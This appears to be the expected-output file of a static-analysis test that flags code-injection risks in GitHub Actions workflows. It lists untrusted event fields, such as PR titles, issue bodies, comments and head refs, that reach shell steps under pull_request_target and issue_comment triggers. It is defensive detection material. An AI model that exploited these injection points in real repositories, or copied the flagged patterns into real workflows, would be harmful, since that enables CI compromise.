| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target |
